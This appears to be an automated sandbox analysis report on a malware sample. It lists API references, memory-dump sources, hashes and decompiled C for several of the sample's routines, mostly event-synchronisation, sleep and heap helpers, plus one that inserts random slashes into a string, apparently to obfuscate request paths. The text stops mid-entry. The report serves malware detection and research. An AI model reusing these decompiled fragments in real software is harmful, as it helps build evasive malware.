0x00d95a53
0x00d95a58
0x00d95a5a
0x00d95a5f
0x00d95a60
0x00d95a65
0x00d95a66
0x00d95a71
0x00d95aa2
0x00d95aa7
0x00d95b6a
0x00d95aad
0x00d95ab4
0x00d95abc
0x00d95b67
0x00d95ac2
0x00d95ac7
0x00d95acc
0x00d95ad1
0x00d95b59
0x00d95ad7
0x00d95ad7
0x00d95ad9
0x00d95adf
0x00d95ae0
0x00d95ae0
0x00d95ae3
0x00d95ae6
0x00d95aec
0x00d95af1
0x00d95af2
0x00d95af7
0x00d95afa
0x00d95b05
0x00000000
0x00000000
0x00d95b0d
0x00d95b15
0x00d95b21
0x00d95b25
0x00d95b27
0x00d95b2c
0x00000000
0x00000000
0x00d95b2c
0x00d95b25
0x00d95b3e
0x00d95b41
0x00d95b48
0x00d95b53
0x00d95b53
0x00000000
0x00d95b2e
0x00d95b2e
0x00d95b33
0x00d95b35
0x00d95b36
0x00d95b39
0x00000000
0x00d95b39
0x00000000
0x00d95b33
0x00d95ae0
0x00d95b5a
0x00d95b5a
0x00d95b60
0x00d95b60
0x00d95abc
0x00d95a73
0x00d95a79
0x00d95a81
0x00d95a9a
0x00d95a9c
0x00000000
0x00000000
0x00d95a83
0x00d95a8d
0x00d95a91
0x00d95a97
0x00000000
0x00d95a97
0x00d95a91
0x00d95a81
0x00d95b73
0x00d945a0
0x00d945a0
0x00d945a7
0x00d945b2
0x00000000
0x00000000
0x00000000
0x00d945a7

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,747C81D0,00000000,00000000), ref: 00D95A5A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00D9896D,00000000,?,?), ref: 00D95A73
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00D9896D,00000000,?), ref: 00D95AEC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00D9896D,00000000,?,?), ref: 00D95B07

Part of subcall function 00D94383: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747C81D0,00000000,00000000), ref: 00D9439A
Part of subcall function 00D94383: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00D9896D,00000000,?), ref: 00D943AA

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: ad78d4ba14774b84a27297aca34966e9abc2115920854bc523dcb37905d24e24
Instruction ID: 8a9438d55c70a093a9d651b65c447d0343787bb0a775b437c8a0e8b2df95d5dc
Opcode Fuzzy Hash: ad78d4ba14774b84a27297aca34966e9abc2115920854bc523dcb37905d24e24
Instruction Fuzzy Hash: 7E41B632600A04AFCF229BA5DC44FAEB7B9EF94364F190535E552E7294EB70ED419730

Uniqueness

Uniqueness Score: -1.00%

Function 00D98F5F, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00D98F5F(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xd9d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0xd9d2a4; // 0x3e3a5a8
				_t3 = _t8 + 0xd9e836; // 0x61636f4c
				_t25 = 0;
				_t30 = E00D91C78(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xd9d2a8, 1, 0, _t30);
					E00D945B3(_t30);
				}
				_t12 =  *0xd9d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00D95946() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E00D949B7(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0xd9d110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E00D95C56(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x00d98f60
0x00d98f67
0x00d98f71
0x00d98f75
0x00d98f7b
0x00d98f8a
0x00d98f91
0x00d98f95
0x00d98fa7
0x00d98fa9
0x00d98fa9
0x00d98fae
0x00d98fb5
0x00d9900c
0x00d9900c
0x00d99012
0x00d99014
0x00d99014
0x00d9901e
0x00d99022
0x00d99034
0x00d99034
0x00d99038
0x00d9903e
0x00d9903e
0x00000000
0x00d98fce
0x00d98fd3
0x00d98fdb
0x00d98fdf
0x00d98fe3
0x00d98fe3
0x00d98ff0
0x00d98ff4
0x00d98ff8
0x00d9904d
0x00d99053
0x00d99053
0x00d99006
0x00d9900a
0x00d99041
0x00d99043
0x00d99046
0x00d99046
0x00000000
0x00d99043
0x00d9900a
0x00000000
0x00d98ff4

APIs

Part of subcall function 00D91C78: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00D98594,74666F53,00000000,?,00D9D00C,?,?), ref: 00D91CAE
Part of subcall function 00D91C78: lstrcpy.KERNEL32(00000000,00000000), ref: 00D91CD2
Part of subcall function 00D91C78: lstrcat.KERNEL32(00000000,00000000), ref: 00D91CDA

CreateEventA.KERNEL32(00D9D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00D98204,?,?,?), ref: 00D98FA0

Part of subcall function 00D945B3: HeapFree.KERNEL32(00000000,00000000,00D95DE9,00000000,?,?,-00000008), ref: 00D945BF

WaitForSingleObject.KERNEL32(00000000,00004E20,00D98204,00000000,00000000,?,00000000,?,00D98204,?,?,?), ref: 00D99000
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00D98204,?,?,?), ref: 00D9902E
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00D98204,?,?,?), ref: 00D99046

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 9356e224c2de075424fd1bc4d9376788ebfc158d3f6bc914f0bececd6932b19e
Instruction ID: af71c687c6c643cd5412f273a1b41af51783c67ab7c0fd83194c9881dba5c170
Opcode Fuzzy Hash: 9356e224c2de075424fd1bc4d9376788ebfc158d3f6bc914f0bececd6932b19e
Instruction Fuzzy Hash: 2221F632500711ABDF316BAC9C55A6BB39AFF84B10F09022AF96AE7255EA61CC018774

Uniqueness

Uniqueness Score: -1.00%

Function 00D94383, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00D94383(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0xd9d140; // 0xd9ab51
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E00D96D10(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E00D945B3(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E00D95802( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x00d94383
0x00d94383
0x00d9438d
0x00d94393
0x00d94396
0x00d9439a
0x00d943a0
0x00d943a5
0x00d943be
0x00d943c1
0x00d943c5
0x00d943c9
0x00d943ca
0x00d943cf
0x00d943d2
0x00d943d9
0x00d943e0
0x00d94433
0x00d94439
0x00d9443f
0x00d9447a
0x00d94480
0x00000000
0x00000000
0x00000000
0x00d9443f
0x00d943e6
0x00000000
0x00d943ed
0x00d943fb
0x00d943fe
0x00d94401
0x00d9440d
0x00d94411
0x00d94473
0x00d94413
0x00d94416
0x00d9441a
0x00d9441b
0x00d9441c
0x00d9441e
0x00d94425
0x00d94463
0x00d9446e
0x00d94427
0x00d9442a
0x00d9442e
0x00d9442e
0x00d94425
0x00000000
0x00d94411
0x00d943e6
0x00d943aa
0x00d943b0
0x00d943b3
0x00d943b8
0x00000000
0x00000000
0x00000000
0x00d94448
0x00d94450
0x00d94455
0x00d94458
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747C81D0,00000000,00000000), ref: 00D9439A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00D9896D,00000000,?), ref: 00D943AA
GetLastError.KERNEL32 ref: 00D94433

Part of subcall function 00D95802: WaitForMultipleObjects.KERNEL32(00000002,00D9A841,00000000,00D9A841,?,?,?,00D9A841,0000EA60), ref: 00D9581D

Part of subcall function 00D945B3: HeapFree.KERNEL32(00000000,00000000,00D95DE9,00000000,?,?,-00000008), ref: 00D945BF

GetLastError.KERNEL32(00000000), ref: 00D94468

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 006ee1c47edf011139342b8b7892faba756fcdcbc8dbc5dea26046a8a82053c7
Instruction ID: 39f478f7ffe9be56ad4701389b13b3f2a2dcca6d4aea85ccf9860f3a3fb5e8f3
Opcode Fuzzy Hash: 006ee1c47edf011139342b8b7892faba756fcdcbc8dbc5dea26046a8a82053c7
Instruction Fuzzy Hash: E23110B5900309EFDF20DFA5C884E9EB7F8EB04340F14856AE542E3251D7709A469F70

Uniqueness

Uniqueness Score: -1.00%

Function 00D98155, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00D98155(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00D96427(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00D9A468(_t23);
						}
					}
					return _t38;
				}
				if(E00D93A8E(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xd9d2a8, 1, 0,  *0xd9d340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00D9822C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00D98C1A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00D93B83(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00D98F5F( &_v32, _t39);
					goto L13;
				}
			}

0x00d98155
0x00d98162
0x00d98168
0x00d98169
0x00d9816a
0x00d9816b
0x00d9816c
0x00d98170
0x00d9817c
0x00d98180
0x00d98208
0x00d98208
0x00d9820b
0x00d9820d
0x00d98215
0x00d9821b
0x00d9821e
0x00d9821e
0x00d9821b
0x00d98229
0x00d98229
0x00d98193
0x00d98195
0x00d98195
0x00d981ac
0x00d981b0
0x00d981b3
0x00d981be
0x00d981c5
0x00d981c5
0x00d981ce
0x00d981d2
0x00d981e0
0x00d981d4
0x00d981d4
0x00d981d5
0x00d981d6
0x00d981d7
0x00d981d8
0x00d981d9
0x00d981d9
0x00d981e5
0x00d981e8
0x00d981ec
0x00d981ee
0x00d981ee
0x00d981f5
0x00000000
0x00d981f7
0x00d981f7
0x00d98204
0x00000000
0x00d98204

APIs

CreateEventA.KERNEL32(00D9D2A8,00000001,00000000,00000040,?,?,747DF710,00000000,747DF730), ref: 00D981A6
SetEvent.KERNEL32(00000000), ref: 00D981B3
Sleep.KERNEL32(00000BB8), ref: 00D981BE
CloseHandle.KERNEL32(00000000), ref: 00D981C5

Part of subcall function 00D9822C: WaitForSingleObject.KERNEL32(00000000,?,?,?,00D981E5,?,00D981E5,?,?,?,?,?,00D981E5,?), ref: 00D98306

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 120621c72735b6230bb57a10b50de8632bea5d41e0f604b8aae2d916578b14e2
Instruction ID: 451aa54e78b804dd513fbfaa5ffa6d58ce9b6d61a392a031ef338a69f13df94f
Opcode Fuzzy Hash: 120621c72735b6230bb57a10b50de8632bea5d41e0f604b8aae2d916578b14e2
Instruction Fuzzy Hash: A6219273D00219ABCF10BFE4D8859AEB7A9EB46B50B09442AFA11F7100DB749D419BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D92070, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00D92070(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xd9d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xd9d250; // 0x870ef7ce
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xd9d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00d92078
0x00d9207b
0x00d92081
0x00d92099
0x00d9209b
0x00d920a0
0x00d920a2
0x00d920a5
0x00d920a7
0x00d920aa
0x00d920ac
0x00d920ac
0x00d920ae
0x00d920b9
0x00d920be
0x00d920cf
0x00d920d7
0x00d920dc
0x00d920df
0x00d920e2
0x00d920e4
0x00d920e7
0x00d920ea
0x00d920ea
0x00d920ed
0x00d920f8
0x00d920fd
0x00d92107

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00D96A62,00000000,?,?,00D988FB,?,04BD95B0), ref: 00D9207B
RtlAllocateHeap.NTDLL(00000000,?), ref: 00D92093
memcpy.NTDLL(00000000,04BD95B0,-00000008,?,?,?,00D96A62,00000000,?,?,00D988FB,?,04BD95B0), ref: 00D920D7
memcpy.NTDLL(00000001,04BD95B0,00000001,00D988FB,?,04BD95B0), ref: 00D920F8

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 1e04e7fb7fb7bf720548fe1c1d7e0a4a42c04f68cc82a873497abed6b46adf71
Instruction ID: b710a45264ad528f4ef4a23b70794b75b9cf2d2da1bfb378812675fe272d22da
Opcode Fuzzy Hash: 1e04e7fb7fb7bf720548fe1c1d7e0a4a42c04f68cc82a873497abed6b46adf71
Instruction Fuzzy Hash: E711C672A00214BFD7108BA9DD88DAABFAADBD5350B050176F508D7250E7749E00C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00D91C78, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00D91C78(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00D95043(_t8, _t1);
				_t16 = E00D96D10(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00D9A677(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00D96D10(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00D945B3(_t16);
				}
				return _t18;
			}

0x00d91c83
0x00d91c84
0x00d91c87
0x00d91c89
0x00d91c94
0x00d91c98
0x00d91c9d
0x00d91ca1
0x00d91ca9
0x00d91cae
0x00d91cb6
0x00d91cb6
0x00d91cbf
0x00d91cc3
0x00d91cc9
0x00d91ccc
0x00d91cd2
0x00d91cd2
0x00d91cda
0x00d91cda
0x00d91ce1
0x00d91ce1
0x00d91cec

APIs

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

Part of subcall function 00D9A677: wsprintfA.USER32 ref: 00D9A6D3

lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00D98594,74666F53,00000000,?,00D9D00C,?,?), ref: 00D91CAE
lstrcpy.KERNEL32(00000000,00000000), ref: 00D91CD2
lstrcat.KERNEL32(00000000,00000000), ref: 00D91CDA

Strings

Soft, xrefs: 00D91C84, 00D91C9D

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 57b045b628012aecd551738720a7e4e827a96f00ae2cc564021ddd59428e2352
Instruction ID: fea540be73164bb90bec27859efada5e5d7f3fe9ef49823b64c3c64ec24728a9
Opcode Fuzzy Hash: 57b045b628012aecd551738720a7e4e827a96f00ae2cc564021ddd59428e2352
Instruction Fuzzy Hash: C601D636240216B7CF123FA8DC84AAF7AACEF84385F094021FA0496201DB75C94187F1

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A40A, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D9A40A(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x00d9a414
0x00d9a418
0x00d9a42d
0x00d9a42f
0x00d9a434
0x00d9a43a
0x00d9a43c
0x00d9a441
0x00d9a44c
0x00d9a443
0x00d9a443
0x00d9a443
0x00d9a441
0x00d9a45a

APIs

memset.NTDLL ref: 00D9A418
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747C81D0,00000000,00000000), ref: 00D9A42D
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D9A43A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00D9896D,00000000,?), ref: 00D9A44C

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 06785b3222e1ab2f309c8ff01e1a597da9a8d2537363f03b3a731ec766183224
Instruction ID: 7e6d83e2eccc13ce4f47a5a87333d84004f4814ca3f5a40ad5ecd53b98efc4e4
Opcode Fuzzy Hash: 06785b3222e1ab2f309c8ff01e1a597da9a8d2537363f03b3a731ec766183224
Instruction Fuzzy Hash: 8CF0FEB2104308BFD7106F66DCC4C2BBBECEB46298B15992FF14692511D672EC054AB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D96555, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00D96555(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E00D96D10(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}

0x00d96558
0x00d9655c
0x00d9655e
0x00d96564
0x00d96568
0x00d9656a
0x00d9656a
0x00d9656c
0x00d96575
0x00d96579
0x00d96581
0x00d96590
0x00d96595
0x00d9659d

APIs

lstrlen.KERNEL32(S:(M,00000000,767FD3B0,?,00D9A3DD,00000000,00000005,00D9D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 00D9655E
memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,00D92018,?,?,?,4D283A53,?,?), ref: 00D96581
memset.NTDLL ref: 00D96590

Strings

S:(M, xrefs: 00D96558

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpymemset
String ID: S:(M
API String ID: 4042389641-2217774225
Opcode ID: 34628b93987f3e663013ae075ebcae00d4b4dcf9430142d1e595e1272a02fcdb
Instruction ID: 0e9e9317528a5b7a2004b55041dce3683087b3ebde09e0be363b2e8abb034a7b
Opcode Fuzzy Hash: 34628b93987f3e663013ae075ebcae00d4b4dcf9430142d1e595e1272a02fcdb
Instruction Fuzzy Hash: 75E0E5B3A0431127CF306AB85C88D4B2AACDBC8350B050825F909C3205D561CC0487B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D96DA6, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D96DA6() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xd9d26c; // 0x2fc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xd9d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xd9d26c; // 0x2fc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xd9d238; // 0x47e0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00d96da6
0x00d96dad
0x00d96df7
0x00d96df9
0x00d96df9
0x00d96db1
0x00d96db7
0x00d96dbc
0x00d96dc0
0x00d96dc6
0x00d96dcd
0x00000000
0x00000000
0x00d96dcf
0x00d96dd4
0x00000000
0x00000000
0x00000000
0x00d96dd4
0x00d96dd6
0x00d96dde
0x00d96de1
0x00d96de1
0x00d96de7
0x00d96dee
0x00d96df1
0x00d96df1
0x00000000

APIs

SetEvent.KERNEL32(000002FC,00000001,00D92228), ref: 00D96DB1
SleepEx.KERNEL32(00000064,00000001), ref: 00D96DC0
CloseHandle.KERNEL32(000002FC), ref: 00D96DE1
HeapDestroy.KERNEL32(047E0000), ref: 00D96DF1

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 698e835fc50a5b2d0ffe22c46c35a0a3c39e986c808fe1b4e04ed0de2297b98b
Instruction ID: daa6c448f3220148f46328029c55404253ba6f3ee7aa61ebd8ed6cb396ca84e6
Opcode Fuzzy Hash: 698e835fc50a5b2d0ffe22c46c35a0a3c39e986c808fe1b4e04ed0de2297b98b
Instruction Fuzzy Hash: 14F039B1B21312DBDF206B35ED4CB527BA9AB04B61F480212BC24D73A4EB35C8009774

Uniqueness

